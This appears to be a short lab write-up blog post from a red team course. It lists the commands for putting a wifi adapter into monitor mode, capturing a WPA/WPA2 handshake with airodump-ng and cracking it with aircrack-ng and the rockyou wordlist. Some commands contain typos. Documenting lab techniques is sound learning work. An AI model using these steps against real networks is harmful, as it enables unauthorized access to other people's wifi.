Cracking Wifi WPA/WPA2 Password

HinaK
2 min readFeb 6, 2021

Aim of this write up is to share my understanding of wifi cracking by mimicking a lab setup, I am going to capture the handshake by de-authenticating target from access point then capture the packets and crack the password using aircrack.

This blog is written as part of Masters Certification in Red Team Program from HackerU.

Step 1: Lets do the lab setup

  • Start Kali linux (virtual machine)as attacker machine, connect wifi adapter and add it under kali box settings > USB.

Step 2: Check adapter and mode set up.

  • Verify wifi adapter is detected by kali machine by running command: iwconfig in terminal.
Wifi adapter detected as wlan0
  • Change wlan0 mode to monitor : airmon-ng start wlan0
Interface changed to wlan0mon and mode is monitor

Step 3: Start airodump and capture nearby access points

: airodump-ng wlan0mon

Step 4: Target acces point found now by manual de-auth forget the access point and reconnect to it, capture handshake while entering password to access point.

: airodump-ng wla0mon --bssid <tagrget bssis> -c <channel number> - -write wpa_crack

Step 5: Cracking the password using aircrack-ng and rockyou.txt wordlist

: aircrack-ng <.cap captured file> -w /usr/share/wordlists/rockyou.txt

Thank you for reading this blog..

--

--